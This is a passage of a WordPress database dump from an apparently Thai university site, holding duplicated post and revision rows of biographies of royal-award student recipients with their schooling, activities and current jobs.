'', '', '2019-05-27 08:28:46', '2019-05-27 01:28:46', '', 520, 'http://172.17.40.11/wp511/?p=521', 0, 'revision', '', 0),
(522, 1, '2019-05-27 08:29:07', '2019-05-27 01:29:07', 'นายจรินทร์  ณรงค์ฤทธิ์\r\n\r\nนักศึกษารางวัลพระราชทาน  ปีการศึกษา 2547\r\n\r\nประวัติส่วนตัว\r\n\r\nชื่อนายจรินทร์  ณรงค์ฤทธิ์  เป็นบุตรของนายสุภาพ  ณรงค์ฤทธิ์  และนางรุ่งรัตน์  สุขปาน  อายุ 24 ปี เป็นนักศึกษาโปรแกรมวิชาการพัฒนาชุมชน  ชั้นปีที่3  คณะมนุษยศาสตร์และสังคมศาสตร์  มหาวิทยาลัยราชภัฏสงขลา\r\n\r\n<hr id="system-readmore" />\r\n\r\nประวัติการศึกษา\r\n\r\n-  ระดับประถมศึกษา  โรงเรียนโคกสมานคุณ  อำเภอหาดใหญ่  จังหวัดสงขลา\r\n\r\n-  ระดับมัธยมศึกษาตอนต้น  ศูนย์การศึกษานอกโรงเรียน  อำเภอนาหม่อม  จังหวัดสงขลา  เกรดเฉลี่ย 2.83\r\n\r\n-  ระดับประกาศนียบัตรวิชาชีพ  วิทยาลัยเทคนิคจะนะ  อำเภอจะนะ  จังหวัดสงขลา  สาขาวิชาช่างก่อสร้าง  ด้วยเกรดเฉลี่ย 3.38\r\n\r\n-  ระดับอุดมศึกษา  สาขาการพัฒนาชุมชน  คณะมนุษยศาสตร์และสังคมศาสตร์  มหาวิทยาลัยราชภัฏสงขลา  เกรดเฉลี่ย 3.33\r\n\r\nผลงาน / รางวัลที่ได้รับ\r\n\r\nปี 2542\r\n\r\n-  เป็นเลขานุการ  องค์การช่างเทคนิคในอนาคต  หน่วยวิทยาลัยเทคนิคจะนะ จังหวัดสงขลา\r\n\r\n-  เป็นคณะกรรมการ  "การประกวดสิ่งประดิษฐ์ของคนรุ่นใหม่  ระดับภาค"  ภาคใต้ ครั้งที่ 10 ณ โรงแรม ซี เอส จังหวัดปัตตานี\r\n\r\nปี 2543\r\n\r\n-  เป็นผู้นำนักศึกษาแผนกวิชาช่างก่อสร้าง วิทยาลัยเทคนิคจะนะ จังหวัดสงขลา\r\n\r\n-  ได้รับรางวัลชนะเลิศ อันดับ 1 ในการประกวด "การโต้วาที" ของอาชีวศึกษาจังหวัดสงขลา\r\n\r\n-  ได้รับคัดเลือกให้เข้าตอบแข่งขันการตอบปัญหาวิทยาศาสตร์ในงาน "ศิลปหัตถกรรมนักเรียนภาคใต้" ครั้งที่ 52 ณ วิทยาลัยเทคนิคสุราษฎร์ธานี\r\n\r\nปี 2546\r\n\r\n-  ได้รับการเลือกตั้งเป็น "นายกสโมสรนักศึกษาคณะมนุษยศาสตร์และสังคมศาสตร์ มหาวิทยาลัยราชภัฏสงขลา\r\n\r\n-  ได้รับโล่ "คนดีศรีราชภัฏ" ประเภทนักศึกษาในปีการศึกษา 2546 ปี 2547\r\n\r\n-  ได้รับการเลือกตั้งเป็น "ประธานสภานักศึกษาภาคปกติ มหาวิทยาลัยราชภัฏสงขลา\r\n\r\n-  ได้รับโล่ "นักศึกษาผู้ทำกิจกรรมเพื่อประโยชน์ส่วนรวมดีเด่น" ในปีการศึกษา 2547\r\n\r\n-  ได้รับ "ทุนเกียรติคุณ ประเภทผู้ทำคุณประโยชน์ให้กับสังคม" จากอาจารย์อัมพร  สุปิติ เมื่อปีการศึกษา 2547\r\n\r\nปัจจุบัน\r\n\r\nอาจารย์โปรแกรมวิชาการพัฒนาชุมชน  คณะมนุษยศาสตร์และสังคมศาสตร์  มหาวิทยาลัยราชภัฏสงขลา  (เปลี่ยนชื่อ - สกุล  เป็น  นายณัฏฐาพงศ์  อภิโชติเดชาสกุล)', 'นายจรินทร์  ณรงค์ฤทธิ์', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b9%8c-%e0%b8%93%e0%b8%a3%e0%b8%87%e0%b8%84%e0%b9%8c%e0%b8%a4%e0%b8%97%e0%b8%98%e0%b8%b4%e0%b9%8c', '', '', '2019-05-27 08:29:07', '2019-05-27 01:29:07', '', 0, 'http://172.17.40.11/wp511/?p=522', 0, 'post', '', 0),
(523, 1, '2019-05-27 08:29:07', '2019-05-27 01:29:07', 'นายจรินทร์  ณรงค์ฤทธิ์\r\n\r\nนักศึกษารางวัลพระราชทาน  ปีการศึกษา 2547\r\n\r\nประวัติส่วนตัว\r\n\r\nชื่อนายจรินทร์  ณรงค์ฤทธิ์  เป็นบุตรของนายสุภาพ  ณรงค์ฤทธิ์  และนางรุ่งรัตน์  สุขปาน  อายุ 24 ปี เป็นนักศึกษาโปรแกรมวิชาการพัฒนาชุมชน  ชั้นปีที่3  คณะมนุษยศาสตร์และสังคมศาสตร์  มหาวิทยาลัยราชภัฏสงขลา\r\n\r\n<hr id="system-readmore" />\r\n\r\nประวัติการศึกษา\r\n\r\n-  ระดับประถมศึกษา  โรงเรียนโคกสมานคุณ  อำเภอหาดใหญ่  จังหวัดสงขลา\r\n\r\n-  ระดับมัธยมศึกษาตอนต้น  ศูนย์การศึกษานอกโรงเรียน  อำเภอนาหม่อม  จังหวัดสงขลา  เกรดเฉลี่ย 2.83\r\n\r\n-  ระดับประกาศนียบัตรวิชาชีพ  วิทยาลัยเทคนิคจะนะ  อำเภอจะนะ  จังหวัดสงขลา  สาขาวิชาช่างก่อสร้าง  ด้วยเกรดเฉลี่ย 3.38\r\n\r\n-  ระดับอุดมศึกษา  สาขาการพัฒนาชุมชน  คณะมนุษยศาสตร์และสังคมศาสตร์  มหาวิทยาลัยราชภัฏสงขลา  เกรดเฉลี่ย 3.33\r\n\r\nผลงาน / รางวัลที่ได้รับ\r\n\r\nปี 2542\r\n\r\n-  เป็นเลขานุการ  องค์การช่างเทคนิคในอนาคต  หน่วยวิทยาลัยเทคนิคจะนะ จังหวัดสงขลา\r\n\r\n-  เป็นคณะกรรมการ  "การประกวดสิ่งประดิษฐ์ของคนรุ่นใหม่  ระดับภาค"  ภาคใต้ ครั้งที่ 10 ณ โรงแรม ซี เอส จังหวัดปัตตานี\r\n\r\nปี 2543\r\n\r\n-  เป็นผู้นำนักศึกษาแผนกวิชาช่างก่อสร้าง วิทยาลัยเทคนิคจะนะ จังหวัดสงขลา\r\n\r\n-  ได้รับรางวัลชนะเลิศ อันดับ 1 ในการประกวด "การโต้วาที" ของอาชีวศึกษาจังหวัดสงขลา\r\n\r\n-  ได้รับคัดเลือกให้เข้าตอบแข่งขันการตอบปัญหาวิทยาศาสตร์ในงาน "ศิลปหัตถกรรมนักเรียนภาคใต้" ครั้งที่ 52 ณ วิทยาลัยเทคนิคสุราษฎร์ธานี\r\n\r\nปี 2546\r\n\r\n-  ได้รับการเลือกตั้งเป็น "นายกสโมสรนักศึกษาคณะมนุษยศาสตร์และสังคมศาสตร์ มหาวิทยาลัยราชภัฏสงขลา\r\n\r\n-  ได้รับโล่ "คนดีศรีราชภัฏ" ประเภทนักศึกษาในปีการศึกษา 2546 ปี 2547\r\n\r\n-  ได้รับการเลือกตั้งเป็น "ประธานสภานักศึกษาภาคปกติ มหาวิทยาลัยราชภัฏสงขลา\r\n\r\n-  ได้รับโล่ "นักศึกษาผู้ทำกิจกรรมเพื่อประโยชน์ส่วนรวมดีเด่น" ในปีการศึกษา 2547\r\n\r\n-  ได้รับ "ทุนเกียรติคุณ ประเภทผู้ทำคุณประโยชน์ให้กับสังคม" จากอาจารย์อัมพร  สุปิติ เมื่อปีการศึกษา 2547\r\n\r\nปัจจุบัน\r\n\r\nอาจารย์โปรแกรมวิชาการพัฒนาชุมชน  คณะมนุษยศาสตร์และสังคมศาสตร์  มหาวิทยาลัยราชภัฏสงขลา  (เปลี่ยนชื่อ - สกุล  เป็น  นายณัฏฐาพงศ์  อภิโชติเดชาสกุล)', 'นายจรินทร์  ณรงค์ฤทธิ์', '', 'inherit', 'closed', 'closed', '', '522-revision-v1', '', '', '2019-05-27 08:29:07', '2019-05-27 01:29:07', '', 522, 'http://172.17.40.11/wp511/?p=523', 0, 'revision', '', 0),
(524, 1, '2019-05-27 08:29:25', '2019-05-27 01:29:25', 'นางสาววิณีนาถ  สุรกำแหง\r\n\r\nนักศึกษารางวัลพระราชทาน  ปีการศึกษา  2548\r\n\r\nประวัติส่วนตัว\r\n\r\nชื่อนางสาววิณีนาถ  สุรกำแหง  เป็นบุตรของนายวาสนา  สุรกำแหง  และนางวาสนา  ศรีชัย  อายุ 21 ปี  เป็นนักศึกษาโปรแกรมวิชานิเทศศาสตร์  ชั้นปีที่3  คณะวิทยาการจัดการ\r\n\r\nมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n<hr id="system-readmore" />\r\n\r\nประวัติการศึกษา\r\n\r\n-  ระดับประถมศึกษา  โรงเรียนเทศบาล 3 (วิมุกตายนวิทยา) อำเภอสุไหงโก - ลก  จังหวัดนราธิวาส\r\n\r\n-  ระดับมัธยมศึกษาตอนต้น  โรงเรียนเทศบาล 3 (วิมุกตายนวิทยา) อำเภอสุไหงโก - ลก จังหวัดนราธิวาส\r\n\r\n-  ระดับมัธยมศึกษาตอนปลาย  โรงเรียนเฉลิมพระเกียรติกรมหลวงนราธิวาสราชนครินทร์บางปอประชารักษ์ อำเภอเมืองนราธิวาส จังหวัดนราธิวาส\r\n\r\n-  ระดับอุดมศึกษา  มหาวิทยาลัยราชภัฏสงขลา  คณะวิทยาการจัดการ  โปรแกรมวิชานิเทศศาสตร์\r\n\r\nปัจจุบัน\r\n\r\nเป็นนักจัดรายการสถานีวิทยุ ม.ก.(มหาวิทยาลัยเกษตรศาสตร์) อำเภอเมืองสงขลา จังหวัดสงขลา', 'นางสาววิณีนาถ  สุรกำแหง', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%87%e0%b8%aa%e0%b8%b2%e0%b8%a7%e0%b8%a7%e0%b8%b4%e0%b8%93%e0%b8%b5%e0%b8%99%e0%b8%b2%e0%b8%96-%e0%b8%aa%e0%b8%b8%e0%b8%a3%e0%b8%81%e0%b8%b3%e0%b9%81%e0%b8%ab%e0%b8%87', '', '', '2019-05-27 08:29:25', '2019-05-27 01:29:25', '', 0, 'http://172.17.40.11/wp511/?p=524', 0, 'post', '', 0),
(525, 1, '2019-05-27 08:29:25', '2019-05-27 01:29:25', 'นางสาววิณีนาถ  สุรกำแหง\r\n\r\nนักศึกษารางวัลพระราชทาน  ปีการศึกษา  2548\r\n\r\nประวัติส่วนตัว\r\n\r\nชื่อนางสาววิณีนาถ  สุรกำแหง  เป็นบุตรของนายวาสนา  สุรกำแหง  และนางวาสนา  ศรีชัย  อายุ 21 ปี  เป็นนักศึกษาโปรแกรมวิชานิเทศศาสตร์  ชั้นปีที่3  คณะวิทยาการจัดการ\r\n\r\nมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n<hr id="system-readmore" />\r\n\r\nประวัติการศึกษา\r\n\r\n-  ระดับประถมศึกษา  โรงเรียนเทศบาล 3 (วิมุกตายนวิทยา) อำเภอสุไหงโก - ลก  จังหวัดนราธิวาส\r\n\r\n-  ระดับมัธยมศึกษาตอนต้น  โรงเรียนเทศบาล 3 (วิมุกตายนวิทยา) อำเภอสุไหงโก - ลก จังหวัดนราธิวาส\r\n\r\n-  ระดับมัธยมศึกษาตอนปลาย  โรงเรียนเฉลิมพระเกียรติกรมหลวงนราธิวาสราชนครินทร์บางปอประชารักษ์ อำเภอเมืองนราธิวาส จังหวัดนราธิวาส\r\n\r\n-  ระดับอุดมศึกษา  มหาวิทยาลัยราชภัฏสงขลา  คณะวิทยาการจัดการ  โปรแกรมวิชานิเทศศาสตร์\r\n\r\nปัจจุบัน\r\n\r\nเป็นนักจัดรายการสถานีวิทยุ ม.ก.(มหาวิทยาลัยเกษตรศาสตร์) อำเภอเมืองสงขลา จังหวัดสงขลา', 'นางสาววิณีนาถ  สุรกำแหง', '', 'inherit', 'closed', 'closed', '', '524-revision-v1', '', '', '2019-05-27 08:29:25', '2019-05-27 01:29:25', '', 524, 'http://172.17.40.11/wp511/?p=525', 0, 'revision', '', 0),
(526, 1, '2019-05-27 08:29:57', '2019-05-27 01:29:57', 'นายมงคล  เกตุสุวรรณ์\r\n\r\nนักศึกษารางวัลพระราชทาน  ปีการศึกษา 2549\r\n\r\nประวัติส่วนตัว\r\n\r\nชื่อนายมงคล  เกตุสุวรรณ์  เป็นบุตรของนายสมยศ  เกตุสุวรรณ์  และนางนิฤมิตร์  สินสวต  อายุ 21 ปี  เป็นนักศึกษาโปรแกรมวิชาการศึกษาพิเศษ ชั้นปีที่3  คณะครุศาสตร์\r\n\r\nมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n<hr id="system-readmore" />\r\n\r\nประวัติการศึกษา\r\n\r\n-  ระดับประถมศึกษา  โรงเรียนบ้านคอกม้า ตำบลบางสน อำเภอประทิว จังหวัดชุมพร\r\n\r\n-  ระดับมัธยมศึกษาตอนต้น  โรงเรียนประทิววิทยา อำเภอประทิว จังหวัดชุมพร\r\n\r\n-  ระดับมัธยมศึกษาตอนปลาย  โรงเรียนศรียาภัย อำเภอเมือง จังหวัดชุมพร\r\n\r\n-  ระดับอุดมศึกษา  โปรแกรมวิชาการศึกษาพิเศษ  คณะครุศาสตร์ มหาวิทยาลัยราชภัฏสงขลา\r\n\r\nปัจจุบัน\r\n\r\nรับราชการครู  สังกัดศูนย์การศึกษาพิเศษ ประจำจังหวัดชุมพร', 'นายมงคล  เกตุสุวรรณ์', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%a1%e0%b8%87%e0%b8%84%e0%b8%a5-%e0%b9%80%e0%b8%81%e0%b8%95%e0%b8%b8%e0%b8%aa%e0%b8%b8%e0%b8%a7%e0%b8%a3%e0%b8%a3%e0%b8%93%e0%b9%8c', '', '', '2019-05-27 08:29:57', '2019-05-27 01:29:57', '', 0, 'http://172.17.40.11/wp511/?p=526', 0, 'post', '', 0),
(527, 1, '2019-05-27 08:29:57', '2019-05-27 01:29:57', 'นายมงคล  เกตุสุวรรณ์\r\n\r\nนักศึกษารางวัลพระราชทาน  ปีการศึกษา 2549\r\n\r\nประวัติส่วนตัว\r\n\r\nชื่อนายมงคล  เกตุสุวรรณ์  เป็นบุตรของนายสมยศ  เกตุสุวรรณ์  และนางนิฤมิตร์  สินสวต  อายุ 21 ปี  เป็นนักศึกษาโปรแกรมวิชาการศึกษาพิเศษ ชั้นปีที่3  คณะครุศาสตร์\r\n\r\nมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n<hr id="system-readmore" />\r\n\r\nประวัติการศึกษา\r\n\r\n-  ระดับประถมศึกษา  โรงเรียนบ้านคอกม้า ตำบลบางสน อำเภอประทิว จังหวัดชุมพร\r\n\r\n-  ระดับมัธยมศึกษาตอนต้น  โรงเรียนประทิววิทยา อำเภอประทิว จังหวัดชุมพร\r\n\r\n-  ระดับมัธยมศึกษาตอนปลาย  โรงเรียนศรียาภัย อำเภอเมือง จังหวัดชุมพร\r\n\r\n-  ระดับอุดมศึกษา  โปรแกรมวิชาการศึกษาพิเศษ  คณะครุศาสตร์ มหาวิทยาลัยราชภัฏสงขลา\r\n\r\nปัจจุบัน\r\n\r\nรับราชการครู  สังกัดศูนย์การศึกษาพิเศษ ประจำจังหวัดชุมพร', 'นายมงคล  เกตุสุวรรณ์', '', 'inherit', 'closed', 'closed', '', '526-revision-v1', '', '', '2019-05-27 08:29:57', '2019-05-27 01:29:57', '', 526, 'http://172.17.40.11/wp511/?p=527', 0, 'revision', '', 0),
(528, 1, '2019-05-27 08:30:11', '2019-05-27 01:30:11', 'นายเจษฎา  หะยียามา\r\n\r\nนักศึกษารางวัลพระราชทาน  ปีการศึกษา 2550\r\n\r\nประวัติส่วนตัว\r\n\r\nชื่อนายเจษฎา  หะยียามา  เป็นบุตรของนายเอกชัย  หะยียามา และนางคอแอเซาะ  หะยียามา  อายุ 23 ปี เป็นนักศึกษาโปรแกรมวิชาการศึกษาพิเศษ  ชั้นปีที่4  คณะครุศาสตร์\r\n\r\nมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n<hr id="system-readmore" />\r\n\r\nประวัติการศึกษา\r\n\r\n-  ระดับอนุบาล  โดรงเรียนอนุบาลยะหริ่ง อำเภอยะหริ่ง จังหวัดปัตตานี\r\n\r\n-  ระดับประถมศึกษา  โรงเรียนบ้านสะบารัง อำเภอเมือง จังหวัดปัตตานี\r\n\r\n-  ระดับมัธยมศึกษาตอนต้น  โรงเรียนเดชะปัตตนยานุกูล อำเภอเมือง จังหวัดปัตตานี\r\n\r\n-  ระดับประกาศนียบัตรวิชาชีพ  วิทยาลัยเทคนิคปัตตานี อำเภอเมือง จังหวัดปัตตานี\r\n\r\n-  ระดับอุดมศึกษา  โปรแกรมวิชาการศึกษาพิเศษ คณะครุศาสตร์ มหาวิทยาลัยราชภัฏสงขลา\r\n\r\nปัจจุบัน\r\n\r\nรับราชการครู  สังกัดศูนย์การศึกษาพิเศษ  ประจำจังหวัดปัตตานี', 'นายเจษฎา  หะยียามา', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b9%80%e0%b8%88%e0%b8%a9%e0%b8%8e%e0%b8%b2-%e0%b8%ab%e0%b8%b0%e0%b8%a2%e0%b8%b5%e0%b8%a2%e0%b8%b2%e0%b8%a1%e0%b8%b2', '', '', '2019-05-27 08:30:11', '2019-05-27 01:30:11', '', 0, 'http://172.17.40.11/wp511/?p=528', 0, 'post', '', 0),
(529, 1, '2019-05-27 08:30:11', '2019-05-27 01:30:11', 'นายเจษฎา  หะยียามา\r\n\r\nนักศึกษารางวัลพระราชทาน  ปีการศึกษา 2550\r\n\r\nประวัติส่วนตัว\r\n\r\nชื่อนายเจษฎา  หะยียามา  เป็นบุตรของนายเอกชัย  หะยียามา และนางคอแอเซาะ  หะยียามา  อายุ 23 ปี เป็นนักศึกษาโปรแกรมวิชาการศึกษาพิเศษ  ชั้นปีที่4  คณะครุศาสตร์\r\n\r\nมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n<hr id="system-readmore" />\r\n\r\nประวัติการศึกษา\r\n\r\n-  ระดับอนุบาล  โดรงเรียนอนุบาลยะหริ่ง อำเภอยะหริ่ง จังหวัดปัตตานี\r\n\r\n-  ระดับประถมศึกษา  โรงเรียนบ้านสะบารัง อำเภอเมือง จังหวัดปัตตานี\r\n\r\n-  ระดับมัธยมศึกษาตอนต้น  โรงเรียนเดชะปัตตนยานุกูล อำเภอเมือง จังหวัดปัตตานี\r\n\r\n-  ระดับประกาศนียบัตรวิชาชีพ  วิทยาลัยเทคนิคปัตตานี อำเภอเมือง จังหวัดปัตตานี\r\n\r\n-  ระดับอุดมศึกษา  โปรแกรมวิชาการศึกษาพิเศษ คณะครุศาสตร์ มหาวิทยาลัยราชภัฏสงขลา\r\n\r\nปัจจุบัน\r\n\r\nรับราชการครู  สังกัดศูนย์การศึกษาพิเศษ  ประจำจังหวัดปัตตานี', 'นายเจษฎา  หะยียามา', '', 'inherit', 'closed', 'closed', '', '528-revision-v1', '', '', '2019-05-27 08:30:11', '2019-05-27 01:30:11', '', 528, 'http://172.17.40.11/wp511/?p=529', 0, 'revision', '', 0),
(530, 1, '2019-05-27 08:30:28', '2019-05-27 01:30:28', 'นายมูนิร  ใจดี\r\n\r\nนักศึกษารางวัลพระราชทาน  ปีการศึกษา 2552\r\n\r\nประวัติส่วนตัว\r\n\r\nชื่อ นายมูนิร  ใจดี  เป็นบุตรของนายบาหรี  ใจดี  และนางบาส๊ะ  ใจดี  อายุ 21 ปี  เป็นนักศึกษาโปรแกรมวิชาการพัฒนาชุมชน ชั้นปีที่4  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nมหาวิทยาลัยราชภัฏสงขลา\r\n\r\nประวัติการศึกษา\r\n\r\n-  ระดับประถมศึกษา  โรงเรียนบ้านโตนปาหนัน ตำบลทุ่งนุ้ย อำเภอควนกาหลง จังหวัดสตูล\r\n\r\n-  ระดับมัธยมศึกษา  โรงเรียนอรุณศาสน์วิทยามูลนิธิ ตำบลทุ่งนุ้ย อำเภอควนกาหลง จังหวัดสตูล\r\n\r\n-  ระดับอุดมศึกษา  ปัจจุบันกำลังศึกษาระดับอุดมศึกษา ชั้นปีที่4 โปรแกรมพัฒนาชุมชน คณะมนุษยศาสตร์และสังคมศาสตร์ มหาวิทยาลัยราชภัฏสงขลา\r\n\r\nกิจกรรม / ผลงานดีเด่น\r\n\r\nกิจกรรม\r\n<ol>\r\n 	<li>เป็นกรรมการองค์การบริหารนักศึกษา  ทำหน้าที่</li>\r\n</ol>\r\n-  ประธานฝ่ายกีฬาและนันทนาการ\r\n\r\n-  รักษาการแทนนายกองค์การบริหารนักศึกษา  ภาคเรียนที่ 2/2551\r\n\r\n-  ประธานค่ายเรียนรู้คุณธรรม  นำชีวิตพอพียง ปี 2552\r\n\r\n-  ประธานค่ายผู้นำร่วมใจทำฝายกั้นน้ำ   ถวายในหลวง\r\n\r\n-  ประธานประสานงานจัดค่ายเยาวชน  ร่วมกับสมาคม  Service  For  Peace  Thailand\r\n<ol start="2">\r\n 	<li>  ในฐานะนักศึกษาโปรแกรมวิชาการพัฒนาชุมชน  คณะมนุษยศาสตร์และสังคมศาสตร์  ทำหน้าที่</li>\r\n</ol>\r\n-  รองประธานนักศึกษาโปรแกรมวิชาการพัฒนาชุมชน ปี พ.ศ.2551\r\n<ol start="3">\r\n 	<li>ในฐานะกรรมการองค์กรเยาวชน  ทำหน้าที่</li>\r\n</ol>\r\n-  เป็นผู้ร่วมก่อตั้ง  องค์กรเยาวชนคนคิดภาคใต้  ( Southern  Youth  Think  Tank)\r\n\r\n-  เป็นหัวหน้าฝ่ายประสานงานองค์กรเยาวชนคนคิดภาคใต้\r\n\r\n-  เป็นวิทยากรผู้ช่วยพัฒนาศักยภาพเยาวชน  องค์กร  Think  Centre  Asia\r\n<ol start="4">\r\n 	<li>ในฐานะผู้แทนเยาวชน  ทำหน้าที่</li>\r\n</ol>\r\n-  เป็นผู้แทนเยาวชน  คัดเลือกโดยองค์กร  Think  Certre  Asia  ให้ไปศึกษาดูงานการบริหารองค์กรเยาวชน  ณ  สหภาพยุโรป  4  ประเทศ คือ  เยอรมัน  ฝรั่งเศส  เบลเยี่ยมและเนเธอร์แลนด์\r\n<ol start="5">\r\n 	<li>ในฐานะสมาชิกลุ่มสมัชชาเยาวชนบ้านโตนปาหนัน  ตำบลทุ่งนุ้ย  อำเภอควนกาหลง  จังหวัดสตูล  ทำหน้าที่</li>\r\n</ol>\r\n-  ช่วยเหลือบริการการจัดงานในชุมชนพัฒนาหมู่บ้าน  พัฒนาแหล่งท่องเที่ยว  รักษาความปลอดภัยในหมู่บ้าน\r\n\r\nปัจจุบัน\r\n\r\nนักพัฒนาสังคม  ฝ่ายสวัสดิการสังคมและพิทักษ์คุ้มครองสิทธิ์  สำนักงานพัฒนาสังคมและความมั่นคงของมนุษย์  จังหวัดสงขลา', 'นายมูนิร  ใจดี', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%a1%e0%b8%b9%e0%b8%99%e0%b8%b4%e0%b8%a3-%e0%b9%83%e0%b8%88%e0%b8%94%e0%b8%b5', '', '', '2019-05-27 08:30:28', '2019-05-27 01:30:28', '', 0, 'http://172.17.40.11/wp511/?p=530', 0, 'post', '', 0),
(531, 1, '2019-05-27 08:30:28', '2019-05-27 01:30:28', 'นายมูนิร  ใจดี\r\n\r\nนักศึกษารางวัลพระราชทาน  ปีการศึกษา 2552\r\n\r\nประวัติส่วนตัว\r\n\r\nชื่อ นายมูนิร  ใจดี  เป็นบุตรของนายบาหรี  ใจดี  และนางบาส๊ะ  ใจดี  อายุ 21 ปี  เป็นนักศึกษาโปรแกรมวิชาการพัฒนาชุมชน ชั้นปีที่4  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nมหาวิทยาลัยราชภัฏสงขลา\r\n\r\nประวัติการศึกษา\r\n\r\n-  ระดับประถมศึกษา  โรงเรียนบ้านโตนปาหนัน ตำบลทุ่งนุ้ย อำเภอควนกาหลง จังหวัดสตูล\r\n\r\n-  ระดับมัธยมศึกษา  โรงเรียนอรุณศาสน์วิทยามูลนิธิ ตำบลทุ่งนุ้ย อำเภอควนกาหลง จังหวัดสตูล\r\n\r\n-  ระดับอุดมศึกษา  ปัจจุบันกำลังศึกษาระดับอุดมศึกษา ชั้นปีที่4 โปรแกรมพัฒนาชุมชน คณะมนุษยศาสตร์และสังคมศาสตร์ มหาวิทยาลัยราชภัฏสงขลา\r\n\r\nกิจกรรม / ผลงานดีเด่น\r\n\r\nกิจกรรม\r\n<ol>\r\n 	<li>เป็นกรรมการองค์การบริหารนักศึกษา  ทำหน้าที่</li>\r\n</ol>\r\n-  ประธานฝ่ายกีฬาและนันทนาการ\r\n\r\n-  รักษาการแทนนายกองค์การบริหารนักศึกษา  ภาคเรียนที่ 2/2551\r\n\r\n-  ประธานค่ายเรียนรู้คุณธรรม  นำชีวิตพอพียง ปี 2552\r\n\r\n-  ประธานค่ายผู้นำร่วมใจทำฝายกั้นน้ำ   ถวายในหลวง\r\n\r\n-  ประธานประสานงานจัดค่ายเยาวชน  ร่วมกับสมาคม  Service  For  Peace  Thailand\r\n<ol start="2">\r\n 	<li>  ในฐานะนักศึกษาโปรแกรมวิชาการพัฒนาชุมชน  คณะมนุษยศาสตร์และสังคมศาสตร์  ทำหน้าที่</li>\r\n</ol>\r\n-  รองประธานนักศึกษาโปรแกรมวิชาการพัฒนาชุมชน ปี พ.ศ.2551\r\n<ol start="3">\r\n 	<li>ในฐานะกรรมการองค์กรเยาวชน  ทำหน้าที่</li>\r\n</ol>\r\n-  เป็นผู้ร่วมก่อตั้ง  องค์กรเยาวชนคนคิดภาคใต้  ( Southern  Youth  Think  Tank)\r\n\r\n-  เป็นหัวหน้าฝ่ายประสานงานองค์กรเยาวชนคนคิดภาคใต้\r\n\r\n-  เป็นวิทยากรผู้ช่วยพัฒนาศักยภาพเยาวชน  องค์กร  Think  Centre  Asia\r\n<ol start="4">\r\n 	<li>ในฐานะผู้แทนเยาวชน  ทำหน้าที่</li>\r\n</ol>\r\n-  เป็นผู้แทนเยาวชน  คัดเลือกโดยองค์กร  Think  Certre  Asia  ให้ไปศึกษาดูงานการบริหารองค์กรเยาวชน  ณ  สหภาพยุโรป  4  ประเทศ คือ  เยอรมัน  ฝรั่งเศส  เบลเยี่ยมและเนเธอร์แลนด์\r\n<ol start="5">\r\n 	<li>ในฐานะสมาชิกลุ่มสมัชชาเยาวชนบ้านโตนปาหนัน  ตำบลทุ่งนุ้ย  อำเภอควนกาหลง  จังหวัดสตูล  ทำหน้าที่</li>\r\n</ol>\r\n-  ช่วยเหลือบริการการจัดงานในชุมชนพัฒนาหมู่บ้าน  พัฒนาแหล่งท่องเที่ยว  รักษาความปลอดภัยในหมู่บ้าน\r\n\r\nปัจจุบัน\r\n\r\nนักพัฒนาสังคม  ฝ่ายสวัสดิการสังคมและพิทักษ์คุ้มครองสิทธิ์  สำนักงานพัฒนาสังคมและความมั่นคงของมนุษย์  จังหวัดสงขลา', 'นายมูนิร  ใจดี', '', 'inherit', 'closed', 'closed', '', '530-revision-v1', '', '', '2019-05-27 08:30:28', '2019-05-27 01:30:28', '', 530, 'http://172.17.40.11/wp511/?p=531', 0, 'revision', '', 0),
(532, 1, '2019-05-27 08:30:44', '2019-05-27 01:30:44', 'นายธีรวุฒ  แก้วมาก\r\n\r\nนักศึกษารางวัลพระราชทาน  ปีการศึกษา  2553\r\n\r\nคนดีศรีราชภัฏ  ประจำปี  2553\r\n\r\n<hr id="system-readmore" />\r\n\r\nการศึกษา\r\n\r\n-  ศิษย์เก่าโรงเรียนหารเทารังสีประชาสรรค์  จังหวัดพัทลุง\r\n\r\n- ระดับอุดมศึกษา  เป็นนักศึกษาโปรแกรมวิชาดนตรี  คณะศิลปกรรมศาสตร์  มหาวิทยาลัยราชภัฏสงขลา  ชั้นปีที่4  ระดับผลการเรียน  3.90\r\n\r\nกิจกรรมที่ร่วมทำขณะกำลังศึกษา\r\n\r\n-  รองหัวหน้านักศึกษาโปรแกรมวิชาดนตรี  ชั้นปีที่ 1 - 4\r\n\r\n-  นักดนตรีลูกทุ่งของวงดนตรีลูกทุ่ง  มหาวิทยาลัยราชภัฏสงขลา\r\n\r\n-  รองประธานชมรมดนตรี\r\n\r\n-  หัวหน้ากิจกรรมน้องพี่ปาริฉัตรสัมพันธ์  คณะศิลปกรรมศาสตร์\r\n\r\n-  วิทยาการสอนน้องร้องเพลง  ในกิจกรรมฝึกน้องร้องเพลง\r\n\r\n-  ผู้ช่วยวิทยากรในโครงการ  "กิจกรรมเข้าค่ายดนตรีออร์เคสตร้า" ของวงออร์เคสตร้าเยาวชนเทศบาลนครยะลา\r\n\r\n-  นายกสโมสรนักศึกษาคณะศิลปกรรมศาสตร์\r\n\r\n-  กรรมการนักศึกษาโปรแกรมวิชาดนตรี\r\n\r\n-  staff  การจัดกิจกรรมด้านดนตรี  ที่จัดขึ้นภายนอกมหาวิทยาลัยราชภัฏสงขลา  อาทิ  คอนเสิร์ตไวโอลินและเปียโน "Carman  Fantasy"  และคอนเสิร์ต  "Wonderful  String  Night"  ที่จัดขึ้น ณ มหาวิทยาลัยสงขลานครินทร์  วิทยาเขตหาดใหญ่\r\n\r\n-  เข้าร่วมกิจกรรมต่างๆ  